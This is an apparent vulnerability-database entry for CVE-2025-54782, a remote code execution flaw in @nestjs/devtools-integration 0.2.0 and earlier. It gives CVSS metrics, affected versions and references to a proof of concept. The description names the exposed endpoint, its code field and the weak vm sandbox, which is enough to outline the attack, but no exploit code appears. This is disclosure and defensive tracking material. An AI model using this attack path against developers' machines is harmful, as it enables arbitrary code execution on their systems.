      "url": "https://socket.dev/blog/nestjs-rce-vuln"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers"
}

FKIE_CVE-2025-54782

Vulnerability from fkie_nvd - Published: 2025-08-02 00:15 - Updated: 2025-10-09 17:31

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc	Exploit
security-advisories@github.com	https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration	Product
security-advisories@github.com	https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7	Exploit, Vendor Advisory
security-advisories@github.com	https://nodejs.org/api/vm.html	Product
security-advisories@github.com	https://socket.dev/blog/nestjs-rce-vuln	Exploit, Third Party Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	nestjs	devtools-integration	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nestjs:devtools-integration:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "3CB5DF69-E7C3-4DBF-920E-E4418A346FEF",
              "versionEndExcluding": "0.2.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1."
    },
    {
      "lang": "es",
      "value": "Nest es un framework para crear aplicaciones escalables del lado del servidor en Node.js. En las versiones 0.2.0 y anteriores, se descubri\u00f3 una vulnerabilidad cr\u00edtica de Ejecuci\u00f3n Remota de C\u00f3digo (RCE) en el paquete @nestjs/devtools-integration. Al habilitarse, el paquete expone un servidor HTTP de desarrollo local con un endpoint de API que utiliza un entorno de pruebas de JavaScript inseguro (implementaci\u00f3n similar a la de evaluaci\u00f3n segura). Debido a un entorno de pruebas inadecuado y a la falta de protecciones entre or\u00edgenes, cualquier sitio web malicioso visitado por un desarrollador puede ejecutar c\u00f3digo arbitrario en su equipo local. El paquete a\u00f1ade endpoints HTTP a un servidor de desarrollo NestJS que se ejecuta localmente. Uno de estos endpoints, /inspector/graph/interact, acepta una entrada JSON que contiene un campo de c\u00f3digo y ejecuta el c\u00f3digo proporcionado en un entorno de pruebas vm.runInNewContext de Node.js. Esto se solucion\u00f3 en la versi\u00f3n 0.2.1."
    }
  ],
  "id": "CVE-2025-54782",
  "lastModified": "2025-10-09T17:31:16.827",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "ADJACENT",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.4,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-02T00:15:25.953",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit"
      ],
      "url": "https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://nodejs.org/api/vm.html"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://socket.dev/blog/nestjs-rce-vuln"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        },
        {
          "lang": "en",
          "value": "CWE-78"
        },
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-54782 (GCVE-0-2025-54782)

GHSA-85CG-CMQ5-QJM7

Summary

Details

PoC

Full POC

Impact

Fix

Credit

FKIE_CVE-2025-54782

Tags

Sightings

Nomenclature